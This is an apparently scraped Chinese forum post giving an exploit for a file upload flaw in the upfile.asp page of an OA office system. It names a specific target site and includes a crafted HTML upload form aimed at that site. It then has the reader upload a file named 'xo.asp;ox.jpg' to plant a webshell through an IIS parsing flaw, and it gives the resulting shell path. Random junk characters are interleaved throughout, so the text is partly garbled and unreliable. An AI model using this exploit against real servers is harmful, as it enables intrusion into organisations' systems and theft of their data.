全能OA办公系统 上传漏洞
5 a* x2 }& y/ Y$ ^4 _# U% c% H) F9 k/ P# ~
系统介绍:- s) c1 r" o) V2 t' ?
2 N9 L6 E' N3 ^5 p, K全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
5 Y8 b+ [) w$ t
( ^: Z. S* y+ _主要功能:
: j% K! A" w/ ` k' L# O' v! D公司通告
1 ~% e$ U+ S! R$ d7 \工作计划 + g7 L( f# G' Z0 c/ s
通讯助理 - D- B/ Z. @( _ V9 ^- V: }
客户资源
: `; y, j2 s1 n+ H4 C7 M我的公文
! m7 m5 C N! Y7 r2 E) i公文传阅 % k2 L* K1 Y S, u8 R$ O
公共资源
! A% k' J, H4 ~资源预约
- e$ _) |( r6 B+ ?8 q4 c今日考勤
1 L' J2 f1 e% y/ B" _6 d5 N+ u: n- }个人计划
4 C1 L! L5 [4 @个人通讯录 / Z% k; x6 y" a1 B5 O+ k* c8 ^$ p
个人基本档案 # G: a3 z/ O, f+ }8 f
未读邮件 3 e9 h1 r/ L! o8 W' G. E
发邮件 * p3 i6 C5 D. }$ J" X; v! L
收件夹
+ Z* q; m8 c; y寄件夹
, Y7 N6 I; v( S网络硬盘 9 W8 P: j; K$ q
网络会议
; o, ^! Q! j6 i$ y& d网络调查
/ _ x3 T" [) \" s交流论坛6 r3 ]3 Y* v' R* }
2 K/ w& q1 R D7 p8 Z1 S' Z3 V
有兴趣测试的朋友可以下源码看看' n$ t- E4 S* c3 N
9 ? k- a2 ?7 o' D& ]7 q源码下载:* p, V2 X; h$ W& i2 l: v
+ B" \9 D- C5 F2 S5 m# }http://www.mycodes.net/30/4750.htm
/ E6 V7 `* t( m& I, j- O. l7 I8 x- @! e( h2 k& X1 W
漏洞介绍:
$ R$ X+ A( p) K. {3 a! i" { @" a' M5 K. D. |4 j- J( \, \; G
由upfile.asp上传文件漏洞引起" o7 ]& G/ f* y) |
[. i1 \/ P, G! w
测试方法:" A" ^- |6 q; x j F
" m% c# H. S$ A2 w6 A. u! q( S- g使用名小子上传http://www.itlynn.com/upfile.asp即可! y' ]; t& o3 d) J3 G. L7 o
' O" S) X( q0 H0 |+ X6 o1 k
如果upfile.asp文件被删除不存在。
7 b( l; [( k) x1 z; q/ Q3 q/ ^/ j( \) m/ P* W1 z& J
那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。# o, Y2 A, P$ ]) F A
# F, `. U3 k. ~8 l
如果存在那么将如下代码保存为upfile.html。8 @* L9 o9 h3 Q, {5 t
$ S) I# x- E4 T' H4 m然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。* v1 |7 E1 o- e# S- w
; \. m8 t6 g4 d& J" H
; d. K7 E/ _- L) e6 c( ?% F' E
' G/ k/ v9 \6 D1 E
01 <table border='0' align="center" cellpadding="5"> 7 W7 T1 Q; {/ C6 |+ ~, g0 q
& B- t7 E6 I) ]3 S5 l& W02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
U/ e, D3 D- j5 i; N% l& P0 {- |. ~' ~1 a( j4 \6 P
03 <tr> / r% W$ ~. C# Y, ^( Z6 r
/ {7 h" Z& h4 j) L }9 ?" K
04 <td>报错:</td>
. W% e) g: l; Q7 P+ U! S. @" M5 U2 ]/ N& A4 ~0 z g
05 <td><input type='radio' name='errnumber' value='0'> # {9 M2 |/ k1 F/ w
5 U# g$ p' R# b0 W0 \$ B& {4 V06 自动更名
6 C( r, h$ N' E5 w/ k1 P" \, s" i$ p: t% ]0 q
07 <input type='radio' name='errnumber' value='1' checked>
# b) R0 a9 A9 D7 E% Z" R# `6 @" [
, u& W2 [5 Q' S& Z& [1 y08 报错方式 0 d) \& y% A2 B Q$ I
! R2 e k' [$ _3 [; l09 <input type='radio' name='errnumber' value='2'>
" h8 J7 Q5 p9 Q6 D3 r! h) y
2 u( @+ ^1 s* l5 E" j# ?( q( w10 直接覆盖</td> . M# @" [9 ?8 {+ T
! L# D! `& c! G! {
11 </tr>
9 }) f& o4 A+ S s* P- U% ]9 I1 w: y4 S
12 <tr>
/ t0 k- E' ], M" v. X/ C+ T: v! |1 E6 |3 l& V
13 <td>主题:</td>
2 p+ D: [5 ~& x. F$ a0 ]1 }
% f$ m- R2 v8 K14 <td><input type='text' name='filename' size='30'></td>
4 H& V- x+ ^$ O. A* u2 |1 G/ X3 m9 i; c; k2 ~/ ]; y
15 </tr> 5 X4 `4 c/ r8 _/ b
& u8 q0 H! a2 i16 <tr> : q6 P" ~8 R- [ A, b: c
2 ?6 S. i @9 O: ~/ X$ V17 <td>文件:</td>
; p& ?2 W* t/ V0 Q; i" `( b( X3 t7 j7 M% P
18 <td><input type="file"name="fruit"size="30"></td> 8 C0 D J( \1 u' B( E7 \% T
! F& o: s& w3 N5 V8 X- `19 </tr> & L6 j' T2 a Q0 y
! n& y0 u: L, O/ W/ \& r
20 <tr> 4 c- k3 _4 K4 x1 I
) `/ F2 x! c' o8 Q& e, {
21 <td valign='top'>简介:</td>
7 }- ]3 i; I5 c7 @- o( o2 h! H# o5 ~7 m' F% G1 u
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> i1 v+ T* ?; a' y# X! d
% w) u/ i r+ Q/ t8 k
23 </tr> # [8 v% U7 y7 n+ c) H
. ` a8 A2 R6 ^0 C
24 5 `/ |' S5 x( X
; d5 C& ^6 B# q& ]* y25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
A' o/ l: U3 k/ `: e' ?7 \6 K. c# v9 J5 d
26 </tr>
/ s H* u- V) J Z! q9 `
; G8 ]) l m( ^9 H0 s' f4 Q27 </form>
8 {1 V, a: M4 M6 j
6 |; Y" U- u W( {9 Z( y然后打开上传一个文件名为xo.asp;ox.jpg的文件。4 ^4 z5 [/ E* H+ @4 }+ q* c
+ R8 y, q1 |. @2 ?( F5 w& ?
* b! e$ e1 b8 H0 N' u* M
3 w2 U- z5 ]/ i# b
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg7 Y; W: M+ V) j* j. f
0 W' R9 b# @, h7 s W. R' f7 a( Q& z
此漏洞需要配合解析漏洞利用。+ J. s2 m* G, a
) {' m+ ^% D5 |- }5 S) A
|